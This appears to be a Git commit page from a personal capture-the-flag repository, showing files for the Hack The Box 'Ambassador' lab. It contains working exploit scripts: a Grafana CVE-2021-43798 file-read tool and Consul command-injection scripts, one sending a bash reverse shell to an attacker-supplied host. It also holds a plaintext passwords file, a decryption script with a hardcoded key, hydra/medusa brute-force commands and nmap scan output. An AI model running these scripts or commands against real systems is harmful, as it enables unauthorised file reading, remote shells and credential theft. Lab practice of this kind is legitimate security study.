simon/CTF
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

init htb

Browse Source 
old htb folders
This commit is contained in:
Simon
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

104
HTB/ambassador/50581.py Executable file
View File

@@ -0,0 +1,104 @@
# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
# Date: 08/12/2021
# Exploit Author: s1gh
# Vendor Homepage: https://grafana.com/
# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
# Version: V8.0.0-beta1 through V8.3.0
# Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.
# CVE: CVE-2021-43798
# Tested on: Debian 10
# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import argparse
import sys
from random import choice
plugin_list = [
"alertlist",
"annolist",
"barchart",
"bargauge",
"candlestick",
"cloudwatch",
"dashlist",
"elasticsearch",
"gauge",
"geomap",
"gettingstarted",
"grafana-azure-monitor-datasource",
"graph",
"heatmap",
"histogram",
"influxdb",
"jaeger",
"logs",
"loki",
"mssql",
"mysql",
"news",
"nodeGraph",
"opentsdb",
"piechart",
"pluginlist",
"postgres",
"prometheus",
"stackdriver",
"stat",
"state-timeline",
"status-histor",
"table",
"table-old",
"tempo",
"testdata",
"text",
"timeseries",
"welcome",
"zipkin"
]
def exploit(args):
s = requests.Session()
headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }
while True:
file_to_read = input('Read file > ')
try:
url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read
req = requests.Request(method='GET', url=url, headers=headers)
prep = req.prepare()
prep.url = url
r = s.send(prep, verify=False, timeout=3)
if 'Plugin file not found' in r.text:
print('[-] File not found\n')
else:
if r.status_code == 200:
print(r.text)
else:
print('[-] Something went wrong.')
return
except requests.exceptions.ConnectTimeout:
print('[-] Request timed out. Please check your host settings.\n')
return
except Exception:
pass
def main():
parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")
parser.add_argument('-H',dest='host',required=True, help="Target host")
args = parser.parse_args()
try:
exploit(args)
except KeyboardInterrupt:
return
if __name__ == '__main__':
main()
sys.exit(0)

18
HTB/ambassador/ape.py Normal file
View File

@@ -0,0 +1,18 @@
import base64
from termcolor import colored
from secure import decrypt
secret_key = "SW2YcwTIb9zpOOhoPsMm"
ciphertext = "dad0e56900c3be93ce114804726f78c91e82a0f0f0f6b248da419a0cac6157e02806498f1f784146715caee5bad1506ab069"
encrypted = base64.b64decode(ciphertext.encode())
try:
pwdBytes, _ = decrypt(encrypted, secret_key)
except:
pwdBytes = None
if pwdBytes is None:
print(colored(f"[!] Unable to decrypt password..\n", "red"))
else:
print(colored(f"[*] Decrypted password: {pwdBytes}\n", "green"))

65
HTB/ambassador/consul_rce.py Normal file
View File

@@ -0,0 +1,65 @@
'''
- Author: @owalid
- Description: This script exploits a command injection vulnerability in Consul
'''
import requests
import argparse
import time
import random
import string
def get_random_string():
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(15))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-th", "--target_host", help="Target Host (REQUIRED)", type=str, required=True)
parser.add_argument("-tp", "--target_port", help="Target Port (REQUIRED)", type=str, required=True)
parser.add_argument("-c", "--command", help="Command to execute (REQUIRED)", type=str, required=True)
parser.add_argument("-s", "--ssl", help="SSL", type=bool, required=False, default=False)
parser.add_argument("-ct", "--consul-token", help="Consul Token", type=str, required=False)
args = parser.parse_args()
protocol = "https" if args.ssl else "http"
url = f"{protocol}://{args.target_host}:{args.target_port}"
consul_token = args.consul_token
command = args.command
headers = {'X-Consul-Token': consul_token} if consul_token else {}
command_list = command.split(" ")
id = get_random_string()
data = {
'ID': id,
'Name': 'pwn',
'Address': '127.0.0.1',
'Port': 80,
"Check": {
"DeregisterCriticalServiceAfter": "90m",
"Args": command_list,
'Interval': '10s',
"Timeout": "86400s",
}
}
registerurl= f"{url}/v1/agent/service/register?replace-existing-checks=true"
r = requests.put(registerurl, json=data, headers=headers, verify=False)
if r.status_code != 200:
print(f"[-] Error creating check {id}")
print(r.text)
exit(1)
print(f"[+] Check {id} created successfully")
time.sleep(12)
desregisterurl = f"{url}/v1/agent/service/deregister/{id}"
r = requests.put(desregisterurl, headers=headers, verify=False)
if r.status_code != 200:
print(f"[-] Error deregistering check {id}")
print(r.text)
exit(1)
print(f"[+] Check {id} deregistered successfully")

26
HTB/ambassador/exp.py Normal file
View File

@@ -0,0 +1,26 @@
#!/usr/bin/python3
import requests, argparse
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", "-rh", type=str, help="remote host (if not specified, 127.0.0.1 will be used)", default="127.0.0.1")
parser.add_argument("--rport", "-rp", type=str, help="remote port (if not specified, 8500 will be used)", default="8500")
parser.add_argument("--lhost", "-lh", type=str, help="local host", required=True)
parser.add_argument("--lport", "-lp", type=str, help="local port", required=True)
parser.add_argument("--token", "-tk", type=str, help="acl token", required=True)
parser.add_argument("--ssl", "-s", action="store_true", help="use ssl (https) in the request")
args = parser.parse_args()
if args.ssl:
target = f"https://{args.rhost}:{args.rport}/v1/agent/service/register"
else:
target = f"http://{args.rhost}:{args.rport}/v1/agent/service/register"
headers = {"X-Consul-Token": f"{args.token}"}
json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}
try:
requests.put(target, headers=headers, json=json, verify=False)
print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
except:
print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
exit(1)

26
HTB/ambassador/exploit.py Normal file
View File

@@ -0,0 +1,26 @@
#!/usr/bin/python3
import requests, argparse
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", "-rh", type=str, help="remote host (if not specified, 127.0.0.1 will be used)", default="127.0.0.1")
parser.add_argument("--rport", "-rp", type=str, help="remote port (if not specified, 8500 will be used)", default="8500")
parser.add_argument("--lhost", "-lh", type=str, help="local host", required=True)
parser.add_argument("--lport", "-lp", type=str, help="local port", required=True)
parser.add_argument("--token", "-tk", type=str, help="acl token", required=True)
parser.add_argument("--ssl", "-s", action="store_true", help="use ssl (https) in the request")
args = parser.parse_args()
if args.ssl:
target = f"https://{args.rhost}:{args.rport}/v1/agent/service/register"
else:
target = f"http://{args.rhost}:{args.rport}/v1/agent/service/register"
headers = {"X-Consul-Token": f"{args.token}"}
json = {"Address": "127.0.0.1", "check": {"Args": ["/bin/bash", "-c", f"bash -i >& /dev/tcp/{args.lhost}/{args.lport} 0>&1"], "interval": "10s", "Timeout": "864000s"}, "ID": "gato", "Name": "gato", "Port": 80}
try:
requests.put(target, headers=headers, json=json, verify=False)
print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener\n")
except:
print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection and try again\n")
exit(1)

2
HTB/ambassador/passwords Normal file
View File

@@ -0,0 +1,2 @@
messageInABottle685427
dontStandSoCloseToMe63221!

0
HTB/ambassador/results/10.10.11.183/report/local.txt Normal file
View File

16
HTB/ambassador/results/10.10.11.183/report/notes.txt Normal file
View File

@@ -0,0 +1,16 @@
[*] ssh found on tcp/22.
[*] http found on tcp/80.
[*] ppp found on tcp/3000.
[*] mysql found on tcp/3306.

0
HTB/ambassador/results/10.10.11.183/report/proof.txt Normal file
View File

29
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Commands.md Normal file
View File

@@ -0,0 +1,29 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml" 10.10.11.183
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml" 10.10.11.183
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.183
feroxbuster -u http://10.10.11.183:80/ -t 10 -w /home/kali/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.10.11.183:80/.well-known/security.txt
curl -sSikf http://10.10.11.183:80/robots.txt
curl -sSik http://10.10.11.183:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.183
curl -sk -o /dev/null -H "Host: awJNEHhLWvIHZHvuoHrK.ambassador.htb" http://ambassador.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.10.11.183:80 2>&1
wkhtmltoimage --format png http://10.10.11.183:80/ /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_screenshot.png
nmap -vv --reason -Pn -T4 -sV -p 3306 --script="banner,(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/tcp_3306_mysql_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp3306/xml/tcp_3306_mysql_nmap.xml" 10.10.11.183
ffuf -u http://ambassador.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.ambassador.htb" -fs 3654 -noninteractive -s | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_ambassador.htb_vhosts_subdomains-top1million-110000.txt"
```

41
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Manual Commands.md Normal file
View File

@@ -0,0 +1,41 @@
```bash
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.183
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.183
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.10.11.183:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.183/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.183 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.183/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.183 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.10.11.183:80 2>&1 | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.10.11.183:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/ambassador/results/10.10.11.183/scans/tcp80/tcp_80_http_wpscan.txt"
[*] mysql on tcp/3306
[-] (sqsh) interactive database shell:
sqsh -U <username> -P <password> -S 10.10.11.183:3306
```

2
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Patterns.md Normal file
View File

@@ -0,0 +1,2 @@
Identified HTTP Server: Apache/2.4.41 (Ubuntu)

110
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Port Scans/PortScan - All TCP Ports.md Normal file
View File

@@ -0,0 +1,110 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml" 10.10.11.183
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_full_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_full_tcp_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.078s latency).
Scanned at 2023-01-24 07:22:49 EST for 335s
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:34 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:39 GMT
|_ Content-Length: 0
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 66
| Capabilities flags: 65535
| Some Capabilities: SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, Support41Auth, SupportsCompression, ConnectWithDatabase, Speaks41ProtocolOld, FoundRows, IgnoreSigpipes, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, LongPassword, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: CQA;\x02((\x1DG(\x0E&BtT@27\x0B%
|_ Auth Plugin Name: caching_sha2_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDC5%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:23
SF::34\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tu
SF:e,\x2024\x20Jan\x202023\x2012:23:39\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(Hello,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20B
SF:ad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConne
SF:ction:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(SSLv23SessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 07:28:24 2023 -- 1 IP address (1 host up) scanned in 335.34 seconds
```

110
HTB/ambassador/results/10.10.11.183/report/report.md/10.10.11.183/Port Scans/PortScan - Top TCP Ports.md Normal file
View File

@@ -0,0 +1,110 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml" 10.10.11.183
```
[/home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt](file:///home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Jan 24 07:22:49 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/ambassador/results/10.10.11.183/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/ambassador/results/10.10.11.183/scans/xml/_quick_tcp_nmap.xml 10.10.11.183
Nmap scan report for ambassador.htb (10.10.11.183)
Host is up, received user-set (0.047s latency).
Scanned at 2023-01-24 07:22:49 EST for 294s
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29dd8ed7171e8e3090873cc651007c75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDLYy5+VCwR+2NKWpIRhSVGI1nJQ5YeihevJqIYbfopEW03vZ9SgacRzs4coGfDbcYa+KPePbz2n+2zXytEPfzBzFysLXgTaUlDFcDqEsWP9pJ5UYFNfXqHCOyDRklsetFOBcxkgC8/IcHDJdJQTEr51KLF75ZXaEIcjZ+XuQWsOrU5DJPrAlCmG12OMjsnP4OfI4RpIjELuLCyVSItoin255/99SSM3koBheX0im9/V8IOpEye9Fc2LigyGA+97wwNSZG2G/duS6lE8pYz1unL+Vg2ogGDN85TkkrS3XdfDLI87AyFBGYniG8+SMtLQOd6tCZeymGK2BQe1k9oWoB7/J6NJ0dylAPAVZ1sDAU7KCUPNAex8q6bh0KrO/5zVbpwMB+qEq6SY6crjtfpYnd7+2DLwiYgcSiQxZMnY3ZkJiIf6s5FkJYmcf/oX1xm/TlP9qoxRKYqLtEJvAHEk/mK+na1Esc8yuPItSRaQzpCgyIwiZCdQlTwWBCVFJZqrXc=
| 256 80a4c52e9ab1ecda276439a408973bef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFgGRouCNEVCXufz6UDFKYkcd3Lmm6WoGKl840u6TuJ8+SKv77LDiJzsXlqcjdeHXA5O87Us7Npwydhw9NYXXYs=
| 256 f590ba7ded55cb7007f2bbc891931bf6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINujB7zPDP2GyNBT4Dt4hGiheNd9HOUMN/5Spa21Kg0W
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GenericLines, Hello, Help, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:22:57 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 12:23:02 GMT
|_ Content-Length: 0
3306/tcp open mysql syn-ack MySQL 8.0.30-0ubuntu0.20.04.2
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 43
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsLoadDataLocal, LongPassword, IgnoreSigpipes, SupportsTransactions, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, InteractiveClient, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: \x01g1\x0D<8\x19#\x08@u6\x18S\x06VdJ\x0D[
|_ Auth Plugin Name: caching_sha2_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%I=9%D=1/24%Time=63CFCDA0%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Tue,\x2024\x20Jan\x202023\x2012:22
SF::57\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
